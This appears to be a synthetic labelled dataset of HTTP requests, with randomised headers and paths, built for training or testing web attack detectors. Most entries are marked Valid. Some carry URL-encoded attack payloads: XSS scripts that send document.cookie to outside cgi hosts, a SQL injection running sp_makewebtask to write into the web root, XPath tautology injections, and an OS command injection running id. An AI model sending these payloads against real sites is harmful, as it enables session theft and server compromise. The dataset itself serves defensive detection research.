Upgrade: 1Zh/3.5, C8i/6.8, I4m/0.2
Warning: 376 www.Ae5dcnr.gif "8yaneahUte" 
X-Forwarded-For: 179.17.241.44
X-Serial-Number: 534170749
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rgroup byQntQhEtH=nd@a&LX4Egj=t9tVmqOJ3N0&snasilSt=8077&gJC-G8=hW9V0LY_&5c=n &ea=za&navimlenaqtya=5100&dumvidevrtst3=r8AF&fnn=061604

End - Id: 7928
Start - Id: 30801
class: Valid
GET /uYo/Xdunyre1lt8hqqneldea/o5Ffo_KjW/nodeMVM5vQ/bceopTeafelntaidiefe/doseoBa8ins8I/_G7K/mmb6DgY/oei6luirto/nfD4fkBohnK8Cv07xOK/1FZwpmsOrLOMOf4uQB.sh?Tseiecten=8ewoiegEagush&Eyan1mTh=fe%3F&2hpvstreo=tGRfOsjpDv&bn4lE=75&uytymeAee=eyrencjzuch&sssmdb9=aFhO_vBh&ncAcu2I8d=y%3C&msuny=shaxTpin3&odrposodyn=5tpemor003i5aoeAea&acrrre6s=d9M.kTOi&tleRTelsdoubnht=m%3D0n7en-en%5C&uayeelhteosgnn=ypTB.yZcz0t. HTTP/1.0
Host: www.ntlaahri9.st
Connection: close
Accept: text/*;q=0.7
Accept-Charset: utf-8, x-mac-chinesesimp, windows-1258, gb2312;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: r-he9;q=0.8, E2Er-nqa6c;q=0.2
Cache-Control: max-stale
Client-ip: 231.34.18.232
Cookie: tea=2
Cookie2: $Version="8"
Date: Thu, 20 Oct 05 02:34:37 CET
ETag: "r8GbOFMovVI_ULq"
Expect: Ntiuo5t
From: eauh@chhrgB5dy.biz
If-Modified-Since: Sat, 17 Mar 07 11:59:33 CET
If-Unmodified-Since: Sun, 18 Sep 05 10:16:00 GMT
If-Match: *
If-None-Match: *
If-Range: "NUu.CbdcflB9H_K"
Max-Forwards: 351
MIME-Version: 6.9
Pragma: pnih='ahser'
Proxy-Authorization: nuit2t Ja4ekbcr=ksnl
Authorization: 3swkae eznh=cdtsa
Range: 40-,5809-053,-843
Referer: http://cextHnX.ch/tmoios.sh
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.1 (compatible; ohBabene; Win98; at4ya; Eooddei; dsri)
UA-CPU: 68000
UA-Disp: 411,4178,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0063x004
Via: 3.5 www.autctrsn.js, HTTP/5.9 31.167.201.177
Transfer-Encoding: nsz2; wrsw0Z=ibc8
Upgrade: uIT/1.8, hdv/9.8
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 277433290484890410
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 30801
Start - Id: 26632
class: Valid
GET /ce.tiff?Ec=htpassthttpprocessing-instruction&h9=iiaIerLorc&jiTuowfAtw=ac%5C2%5B&hmhelAttahedrT=359 HTTP/1.0
Host: www.3hnalhban.org:80
Connection: eeerdon
Accept: */*
Accept-Charset: iso-8859-15, isiri-3342;q=0.3, windows-874, iso-8859-3, windows-1253;q=0.7
Accept-Encoding: gzip;q=0.4, identity, deflate;q=0.3
Accept-Language: *
Cache-Control: min-fresh=66592
Client-ip: 147.16.61.41
Cookie: e9badtpeasPue=523225901;fapAb0fh=116;II-.B1Xopt=4942;dKsIz@m1g=qCKrl6;arc4rymuh9n=14335753;iF=391937
Cookie2: $Version="9"
Date: Wed, 07 Jan 09 12:44:30 GMT
ETag: W/"xK2KPSsK0S8p@T34H"
Expect: 100-continue
From: ceebh8z@anOtt1nhog.cz
If-Modified-Since: Tue, 21 Aug 07 23:40:24 CET
If-Unmodified-Since: Mon, 10 Mar 08 18:25:04 UTC
If-Match: "vgH_H6At8Xix..HU"
If-None-Match: *
If-Range: *
Max-Forwards: 436
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="Ernotl4"
Authorization: hmtyd t0spe=gdEs
Range: 442029-,4-
Referer: http://aHbecx.fr/hIli8.mpg
TE: gzip;q=0.7,gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: 36oyeiTlanisDoesite
UA-CPU: Sparc
UA-Disp: 080,9861,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: ieh/2.9 166.168.205.144:7832
Transfer-Encoding: gzip
Upgrade: iqeeh/8.0, lpstrb/3.7, 0ddrat/0.4, ieq/2.7, n5pdk/3.6
Warning: 556 www.nSecserr.shtml "kaqb8" "Fri, 10 Aug 07 08:19:22 CET"
X-Forwarded-For: 98.254.54.114
X-Serial-Number: 21651458708939157204
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 26632
Start - Id: 7672
class: Valid
PUT /11XJK7ZT5imzJ/ysKplczKzNtbJjY6/7wSwepcjt/ar5Zw5/0n/i6.png? HTTP/1.1
Content-Length: 239
Content-Language: n,tdmse8
Content-Encoding: identity
Content-Location: http://esNes.uk/tlxtr8w/Cr6enk/l1scer/7o4vce3.mp3
Content-MD5: TW9lbHdHYmxsbGFpdHhuMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jul 04 06:35:24 GMT
Last-Modified: Mon, 30 Jan 06 15:36:52 CET
Host: www.Ahh4sNzo1.it
Connection: wiNuOot
Accept: application/zip;q=0.1, video/mpeg
Accept-Charset: x-mac-cyrillic, macintosh;q=0.7, ks_c_5601-1987, windows-1257;q=0.5, windows-1253;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale=5154
Client-ip: 41.206.202.253
Cookie: za8Gmegsu2=aez
Cookie2: $Version="606"
Date: Mon, 08 Jan 07 09:44:23 GMT
ETag: W/"5IE9rBjdiYylKEB"
Expect: 100-continue
From: iein@nruizurNh.it
If-Modified-Since: Thu, 29 Oct 09 17:46:57 UTC
If-Unmodified-Since: Tue, 20 May 08 08:23:58 GMT
If-Match: "eVdA9nRfKUt_nT4L_f"
If-None-Match: "rSP6pjI-OU2CAqGJN"
If-Range: *
Max-Forwards: 7451
MIME-Version: 4.9
Pragma: rybVeDse=d
Proxy-Authorization: uocnn dT6my=esqesaq
Authorization: Digest cnonce="eNtto"
Range: 3057-62032,67283-,-7611
Referer: http://wooOr.uk/tbZmE/3iab/eoeS.png
TE: deflate
Trailer: Accept
User-Agent: Mozilla/3.0 (Machintosh; U; Mac OS X 4.0; c3-v0; rv:2.0.4) Gecko/09139436
UA-CPU: Sparc
UA-Disp: 5950,8626,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0413x678
Via: HTTP/3.3 244.215.235.106, 8.9 www.trrrtat.js
Transfer-Encoding: compress
Upgrade: reasrf/4.1
Warning: 953 www.sgtzoeOm.png:0 "musiwDeiogabd1ld" "Fri, 16 Jan 04 11:28:31 GMT"
X-Forwarded-For: 116.49.9.190
X-Serial-Number: 117057517
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

WsbqXvbscriptvnc=5791248266&d7cZToBc=Pl&zcohera= ~nse&iariezaer8rzt=rfu7&r1xout2a=sddnU&Fp9rOeeqnu=$&nracfaPgru=rPKkTbdp&As5pmeBas2s6n=|8eeu fbt&ts5cNEfzilitad=se&edeei9v=03013&oitAam2=E0t&2adminDPRk=imgceor3 tnodetclovar7&na7y=94459

End - Id: 7672
Start - Id: 23548
class: Valid
GET /n9seEkitSbOrts.exe?r6Gqads=8u0Z&Gxudid95rZL3L=ems6&Ectsn98U=oa+lptl&olE=512&Fq3access_log=37776657&5a0vNwtBLmisaoe=3796392869&std=eHe4t..4Ey05&esnh3oSseoti7t=%3Amth%2F&sexcaPh2=7282962090&7tlreTolome=iue7tfu&gvrcp2=daue9 HTTP/1.1
Host: 102.99.251.2
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-8-i;q=0.8, x-mac-ce, iso-8859-8, windows-1254;q=0.4
Accept-Encoding: 
Accept-Language: Triaa0-lnran;q=0.4
Cache-Control: max-stale=4
Client-ip: 186.208.141.68
Cookie: ehllpOlnliurue=havingls:enPjfch;yce=a;eosAapali=ih7Qh_C
Cookie2: $Version="925"
Date: Thu, 01 Oct 09 04:08:43 UTC
ETag: "ATZ1OC@4L_0pKrDwRh"
Expect: t2erc=irB5;roAq2sbc
From: otyi@toidujaio.be
If-Modified-Since: Tue, 09 Oct 07 02:38:12 CET
If-Unmodified-Since: Wed, 23 May 07 11:29:45 UTC
If-Match: "yUeeyqQZT4iBi1tvcDW"
If-None-Match: *
If-Range: *
Max-Forwards: 85
MIME-Version: 2.1
Pragma: heqypo=ipbo
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: Basic bnVoc2JvOmVBcnlpaUNi
Range: 9-582047,9-,23678-00
Referer: /glatr.js
TE: gzip
Trailer: Referer
User-Agent: Mozilla/4.8 (Machintosh; U; PPC 7.3; ob-di; rv:5.1.8) Gecko/42446556
UA-CPU: StrongARM
UA-Disp: 295,456,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4426x0282
Via: HTTP/6.1 www.mrsotrs.tiff
Transfer-Encoding: compress
Upgrade: wsepm/7.5, 5aaet/0.7, No5jm/7.8, gbfr/4.3
Warning: 266 191.138.56.230:98 "diio" "Tue, 17 Apr 07 03:38:46 CET"
X-Forwarded-For: 224.154.235.176
X-Serial-Number: 74768537554574
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23548
Start - Id: 47158
class: XSS
GET /ntbevprmeeekkedaensa/Ipp-m9Nmocha3/echoXMUt/strgmy1orn3crte/cNAC_8iu7-FO/rsNh4rpIer1elSsugAm/sbtsheuljesWemiac/eOu6BiZrC.g8@JK/StelnetAsy67omPLj/tN.css?nUDDupdate9documentz44=596370&rYHo0Tddi=objectFAeog6a+h%3E&s4oiun=%5Cn&bkvimcbA=lm%29ntdropnegneef6d&so=es%28b%2FrrtntSt4m&9hWsHi=9404069&ThsFlsatyntr=%3Cmeta++++http-equiv+++%3D%22+refresh+%22+++++content++%3D+%22++0%3Burl%3Djavascript%3A++++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.asieerti.com%2Fcgi-bin%2Fsent.cgi%27%2Bdocument.cookie%29%3B%5D++++%22+++%3E&DsInetcatpositionOQPkisb=rft1saav3ninr2&w6ra1RnraaOrhn=817726308&OeRceRt4e5nOhR=19&x63Lp=axNoteDt&sfbofqnEig=%3Ah7rsa0annd4Ptu&iem4edhu=1575&l1tntaee=ibbe8hnoTqrl&pnH9MmsUftnc=wgKA HTTP/1.1
Host: www.Ren7maO.be:73247
Connection: close
Accept: video/quicktime;q=0.7, text/*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.7, gzip;q=0.4, deflate;q=0.8, compress;q=0.7
Accept-Language: 7eedosT-ihrrmmh;q=0.5, sdnaj-sopnsa, e-ties9lih;q=0.1, hsa-unWo
Cache-Control: 8Hnesn=gmtdhril
Client-ip: 35.253.169.121
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="988"
Date: Tue, 29 Sep 09 19:31:42 GMT
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: ssietn1a
From: cmah8o1@6tablsue.st
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Thu, 22 Nov 07 16:20:04 GMT
If-Match: *
If-None-Match: "fg1D@u5do8NGQxV5A"
If-Range: Mon, 17 Oct 05 16:17:25 UTC
Max-Forwards: 4
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic aWllbmlnbTpjZW90
Range: -016,1-,67332-47295
Referer: http://www.rDNbned.org/cfwol/sxrr9y/r5dud/dIhhrb/hlhgmee9.asmx
TE: gzip;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 7.5; vt-au; rv:3.0.9) Gecko/90134489
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: gzip
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 36.159.65.174
X-Serial-Number: 02973768667711464
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47158
Start - Id: 41145
class: SqlInjection
GET /gqM8LOj4Vhkr6jy/elebodliG8/pvWHgJJK-/0MCF/dBhtpass1KXX0lnj/iNYjWN.tiff?oeautrttoee9tn4=C0nheeus01soh&hfq8nc=gsDihu&hhqe2=79&qse=%27%3B++++EXEC+master.dbo.sp_makewebtask++++%27c%3A%5Cinetpub%5Cwwwroot%5Ceisaiti.shtml%27%2C+%27SELECT+sma++++FROM+o74++WHERE++++xtype%3D%27%27U%27%27%27&6asjdlm=IihtcHtzicnaiua&leetph=eg&kHtBNisqj=oO_DP&xBG5tmp=tnj7&a9ptigDnryeeemc=nl9S&rr=e2+Jevfng&end=66&_ecatFJVnph-0KK=uimgnhzg%27 HTTP/1.1
Host: 197.134.202.187
Connection: yerr3e1
Accept: video/*;q=0.5
Accept-Charset: windows-1253;q=0.8, euc-tw, iso-8859-9;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: senfGs='r'
Client-ip: 39.199.57.125
Cookie: oelyb4nfnnuw=av-XxZFQC
Cookie2: $Version="645"
Date: Thu, 09 Oct 08 23:01:13 CET
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: txaWstrh@gamw.fr
If-Modified-Since: Sat, 16 May 09 09:48:14 UTC
If-Unmodified-Since: Fri, 25 Nov 05 15:42:49 CET
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: "gQACsvf77@SdGqFNOQBJ"
If-Range: *
Max-Forwards: 316
MIME-Version: 7.8
Pragma: ooaq=noslBc
Proxy-Authorization: Digest algorithm=nnLn
Authorization: nldNaa hguiahmv=Neincenm
Range: 70-3
Referer: http://www.shiiv.de/rQbc/thesutt/7egat/l9e1/92nr.jpg
TE: gzip;q=0.4
Trailer: Date
User-Agent: Mozilla/5.9 (compatible; MSIE 4.4; Win 9x; wkErs9i)
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6392x3282
Via: HTTP/2.2 www.ZusTdn.shtml:377, HTTP/1.4 www.ypaa.css:2, 0.6 119.148.86.49
Transfer-Encoding: compress
Upgrade: ng6s/4.8, 4et/8.2
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 566074493
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41145
Start - Id: 49624
class: XPathInjection
GET /4eatnun51tcia1tehy/wehoSeaahstpc/5v_YyQ%uMBGz-/eKB1eJrXL8jeP/tpndrmhi6sv/sFeZ4XNk8U/tz/8zmr5xtvxqpg5/rwS.cfm?av4tpdt=648&c4iogUmzi=24&uwlZehr=le2%2Fha%2Fo6o%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D5%5D+++%7C+++++poan%2Fr%2Fb2y%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D57%5D+or+++%27fr%27+++%3D++++%27&imalireay4pt3sc=1&kwgn=57336&zerte0arenntsr=ad&rev=3120773377&sjkraHe4ac=0+a%3ErIo&pa9m0uoe=854398046 HTTP/1.1
Host: www.oeqot.fr
Connection: keep-alive
Accept: video/*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: lvsoik-istn;q=0.3, eae-sleu;q=0.6, drute-myeaYnh4
Cache-Control: min-fresh=72016
Client-ip: 160.104.242.188
Cookie: dmrbndwexi=hcyO;og90bi=Msaeinosi;edtbUsS=e'stsyAeS;bodyY2YTTiframeda=g6iHsysfmetaUs;jKOX=6468345432;h5pXOfS=mnGX-_4LYadm
Cookie2: $Version="34"
Date: Mon, 21 Jul 08 01:37:24 GMT
ETag: "d_atRBP91QL9mPSF61cb"
Expect: 100-continue
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Sun, 29 Aug 04 13:14:20 GMT
If-Unmodified-Since: Tue, 03 Nov 09 24:26:00 GMT
If-Match: "ht7p-6lBnvt3Ffw66o3c"
If-None-Match: *
If-Range: Tue, 23 Mar 04 05:56:54 GMT
Max-Forwards: 469
MIME-Version: 0.2
Pragma: i=nflf
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: Digest uri=/q5hlee0.doc
Range: 05-349
Referer: http://mirptrD.net/lc6hcn.bin
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/9.0 (compatible; MSIE 7.1; Win98; HlriGt2ee; treytTayrn)
UA-CPU: StrongARM
UA-Disp: 177,5703,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 5.2 www.uimA.js
Transfer-Encoding: tedco; rtyeddya=lochU
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49624
Start - Id: 35752
class: XPathInjection
GET /ioteNaeoett/VO7H@NPhy3mEUH/dea./psbetween.admin9sUMaaoptRj/t7Fdwmfw/we/fWgqK/tW8nbM/ew08P6qHProo@1yj/kY4mITb2T1Sv.php4?a8=335500729&8dCZ1v=apassthruu0mrbgen&si=998&eoaeienayt6rgc=98&Sjz8j6M@all=eP6tdmt72i&EdanmesTsauree=sa2Myilr5SqeuT&d3e3fbolNspah=1&yrUoixl6=delete%3E&Peaa4atcnrct=79dwn%27+++or++++paN%2FNi1aro%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D4%5D+++++or++%27tnlet%27%3D%27&y8EO=37429&but6o5g5d9qlf7=mochaoweL%2B&tk=yb6i HTTP/1.1
Host: 143.108.42.69
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Onxoshwr-daoemt, e-neihNwu;q=0.9, aOozg1t-ek
Cache-Control: no-transform
Client-ip: 64.250.168.166
Cookie: imh6yeYte=c2qtis\id;63xterm.vC=Se;raaAusrleltr\g;5PkSunionlibI=childsgbtq;s3At0labodtr3=aFrc7ratne;tTN=87759
Cookie2: $Version="40"
Date: Sat, 20 Jan 07 03:25:10 CET
ETag: "Y2G28OgdZeEhliz"
Expect: ir13aesi=oye3fea;4ez86tn=EcuoTpy
From: nsEeee@gxtagow.be
If-Modified-Since: Sat, 26 Nov 05 05:31:57 GMT
If-Unmodified-Since: Fri, 22 Jun 07 21:06:34 UTC
If-Match: *
If-None-Match: "VjJVnWNjR81EaPTFE8-"
If-Range: Fri, 08 Jul 05 09:15:50 GMT
Max-Forwards: 419
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: Digest username="ectz2a"
Range: 912919-0,159182-1735
Referer: /5selgq/rntmttas/xrrcadu/teezpe/rtQ2.swf
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: uAS5xl- http://www.airM.st
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: Tgautw/2.7 173.0.145.18, 3.5 www.fdnwfo.css
Transfer-Encoding: compress
Upgrade: Toa/4.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 040193563593
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35752
Start - Id: 43216
class: OsCommanding
GET /0opdydts9uzyRen3/c4C2mAB8tIx/EaenAceiggOE/itfbDl4/-63U/kEIAJQPyKbjya9/iEyDeee6Idjz4mhpoen/5oupdateZG/wsdEOc/rt6atfRutr5lerauna.tiff?oxjhplooeosq9R=res&GT.RyyGJZBLT=hf&p0oLsgeq6ikoa=nT4U27ZUE5l&2OeyhOnkf4=ji%285&eh5n2nittst=29&jPG-7cmdKB5ZO=cuh&bcaEse4hgo=%7Cecho++%22+++++Content-Type%3A+text%2Fhtml%22+++++%3B+echo+++%22%22++%3B++id%5C0&ereei=rcol&jxn=eWs&aiteRoEctoEtri=aieoYs_rJKl&UzMchilddgqUUp=e2h0tmposllurh&lmNoI=11&bS=aT-At&lscaire6uyla=hwinnthtacceswaimexecbody+glIn+o&rh7ftsaeTyene=ebsnEh+eep%3Aysrtb0i%5C HTTP/1.0
Host: 129.145.35.65
Connection: lulcs
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: pi-ecr;q=0.7, j7lyougo-sst, uooa-8eey6oy;q=0.0, iidhLe-u;q=0.6, 5oari-gay;q=0.3
Cache-Control: no-transform
Client-ip: 59.228.253.1
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="350"
Date: Thu, 24 Sep 09 23:08:27 GMT
ETag: W/"Dx8LFZguVMuaJIBl"
Expect: 100-continue
From: oaiin@sieotlre.cz
If-Modified-Since: Thu, 18 Sep 08 10:08:03 CET
If-Unmodified-Since: Tue, 22 Dec 09 23:08:36 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Jul 09 14:00:06 CET
Max-Forwards: 702
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: mfey smnSW=fltvk
Authorization: ton5w eo0iw=9u8fi
Range: 2403-,12114-9,53-40810
Referer: /eObVnqou/egbtnt.css
TE: deflate;q=0.3,gzip,trailers
Trailer: TE
User-Agent: Mozilla/9.5 (compatible; MSIE 7.7; WinNT; ag3dfPeuf)
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 476x125
Via: twm/1.6 www.auntsqe1.shtml
Transfer-Encoding: lauvse; eychmig=l1athgp
Upgrade: pIh6l/8.2, tEst/3.2
Warning: 931 29.33.161.132:937 "tiriHq" "Sun, 23 Apr 06 11:58:11 UTC"
X-Forwarded-For: 33.3.87.207
X-Serial-Number: 3512760212193
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43216
Start - Id: 32551
class: Valid
GET /atmid/kkkUQykvEswbjHEYu/oa0eFenun/momKp/62MY.js?wnIdha0msab=e%3B%3E77lEi HTTP/1.1
Host: 155.130.228.103:52802
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.8, deflate;q=0.6, compress, gzip;q=0.1, identity;q=0.6
Accept-Language: h-R
Cache-Control: max-age=8
Client-ip: 92.6.43.153
Cookie2: $Version="9"
Date: Thu, 13 Jan 05 18:17:02 GMT
ETag: "nTlIlsTV2OCFtbCD"
Expect: asrcotau=eNou;frem8Hta
If-Modified-Since: Tue, 08 Nov 05 03:14:37 GMT
If-Unmodified-Since: Sun, 11 Apr 04 24:29:21 GMT
If-Match: "8@f1voh7_J9cfm0EL"
If-None-Match: "sD_qOvIsuOnQ@ap"
If-Range: Tue, 29 Jul 08 15:22:13 UTC
Max-Forwards: 938
Pragma: d=ll0tvr
Proxy-Authorization: Basic aHJPTGl3OnI5cGh0aQ==
Authorization: r9ta aiyxstno=oapha
Range: -2250
Referer: http://Rrei8au.uk/y47COez/yaeacEal/lepR.swf
TE: trailers,trailers
Trailer: If-Range
User-Agent: Aodaf (wWxU0cmXWE; o5E90S9; pvlAh6h@IR; 8O8Wtf)
UA-OS: Windows 98
Via: HTTP/0.4 www.avAoto.css, FTP/7.6 36.118.186.195:49387, HTTP/4.9 www.2iffd.css
Transfer-Encoding: deflate
Upgrade: Zdunm/1.4, isis8/6.5, eo3Lls/9.9, goetrs/6.0
X-Serial-Number: 6346547194291143

null

End - Id: 32551
Start - Id: 14467
class: Valid
GET /esslsnsfrtia/bZXYd@DX6fPf33d3/eehoun4trmt6tv/dlmatrzksrt/cTFscn/nGHL5ngVSruDKRV3/iBYw@l4nnRr0e1@TuLO/erdlE8/rdQBR/eGC51MB@N1KuPaIL/iz.gif?nazaeOOn=8Dn&sisph=bE1eriuptH&foeaieeHnrde=tErcp7o&nmsf7d=Seesdsd&Sworo=%3AEorn8rgtst%3B%27we&pTiXGFs8p=7979&Sh7jZpbetween8kbodyhome=2678892&lUhlogX.Jg=te0malEt4&Tsock_streamwsXsqNX=662 HTTP/1.1
Host: www.Beudylta.de
Connection: keep-alive
Accept: text/plain
Accept-Charset: utf-8
Accept-Encoding: *;q=0.7
Accept-Language: sy-gukeEEd;q=0.6, eh8ide-axnymSh
Cache-Control: no-store
Client-ip: 137.67.57.59
Cookie: 7r=5;12=hoVijR8e;.4CoRS=estbU2stlnxqu4e;ebdureeeoetdMI=rirnahhn;rO9n=4651;es1srekhmt=z
Cookie2: $Version="468"
Date: Tue, 14 Aug 07 23:02:48 GMT
ETag: "f66MDt5-FhVArWAl-ffw"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Sat, 03 Jun 06 01:40:05 GMT
If-Unmodified-Since: Tue, 01 May 07 24:55:20 CET
If-Match: "PlJSiCSOd7Y-hZfDo.@R"
If-None-Match: ".boqYgCQVhyRdmRr1wP"
If-Range: Sun, 18 Feb 07 01:32:00 UTC
Max-Forwards: 9
MIME-Version: 6.8
Pragma: esItafOs='ohds'
Proxy-Authorization: Basic b0x1ZmF3OmVvcmFhdEFO
Authorization: Basic RGVlaEVyYTpscmNkZQ==
Range: 063-,416644-557318
Referer: http://snen.net/Oobe/pncehAn/OevopsiR.dll
TE: trailers
Trailer: From
User-Agent: Mozilla/3.9 (Windows; U; WinNT 0.6; 07-sl; rv:0.8.4) Gecko/54579478
UA-CPU: 68000
UA-Disp: 927,088,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 332x177
Via: fErt/1.0 10.8.22.162, FTP/5.2 www.6nredn.shtml
Transfer-Encoding: deflate
Upgrade: Iths/7.0, 0tn8e/8.0, sestr/5.4, eaiaus/8.0, odadf/1.4
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 57.244.86.38
X-Serial-Number: 309851
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14467
Start - Id: 19077
class: Valid
GET /3VKkgvvw1m/4Z_xAn.aspx?holH1t8se7aei=8564251163&ZCM7IiSgDL=awi%5D&sDenoySgt=188 HTTP/1.1
Host: www.eatsrny.it
Connection: keep-alive
Accept: application/x-tar;q=0.8, text/*, image/*;q=0.9
Accept-Charset: x-mac-chinesesimp;q=0.4, iso-2022-jp;q=0.2, gb2312
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=44
Client-ip: 222.183.198.147
Cookie: vpksioxc=M8boot.ini
Cookie2: $Version="27"
Date: Wed, 20 Apr 05 16:40:59 GMT
ETag: W/"QWpFKjusKYHBprmvLKy4"
Expect: 100-continue
From: jgqen@7tosiu.st
If-Modified-Since: Fri, 15 Aug 08 03:44:22 UTC
If-Unmodified-Since: Wed, 12 Jan 05 01:54:20 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Jun 06 19:24:49 GMT
Max-Forwards: 45
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM NHBwdDFldGVlaXQxbm1nb3J0SXRobnlubnRyczV0ckFobmhlYQ==
Authorization: Basic a2VtbTplcmlhc3R0
Range: -98,0008-41,92-
Referer: http://e2h0a.it/pheici/orOmk/swerch/eTeeetC/taano.mdb
TE: gzip;q=0.0
Trailer: Date
User-Agent: cseaulnoeseSAmhui
UA-CPU: MIPS
UA-Disp: 603,8155,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x039
Via: HTTP/1.9 www.hpaNuub.gif, 2.1 102.122.7.12, n3edzr/2.4 88.74.187.240
Transfer-Encoding: compress
Upgrade: mTec5/5.9, iRo/8.2, 5e5e/7.4
Warning: 342 204.151.63.29 "ebtn0ofEoku" "Fri, 09 Oct 09 08:23:52 CET"
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 594077
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19077
Start - Id: 47700
class: XSS
GET /XJ3ijexecnullW4dn/sVAcme/OacnnNltritltond/.AwCD13/ezsswxr0edi3oearero/wozaC/DZd1CQPO5m/efrteewoaoewsR.bin?isSe=trHavd&h1tras4dbfe=%3E+%40t&Zwu_Xxh=nHm8ootk0dsdo5he&sgetio6i=%5Bm0&neOt=77&obruwr8h=9304&asr=%26%3Cscript+++%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.er.com%2Fcgi-bin%2Fille.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E&ORVetcC0dW8Bbun=auGB&iE1tIvticsekd=%27selecta&ieeo2deheh=exWsoGUvH11&ceeshe1itse99h=ptwnhn&lenhn8ta=h%7Clinkijjstdine-0nllw HTTP/1.0
Host: www.ura94eIia.uk:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.7
Accept-Language: *
Cache-Control: max-stale
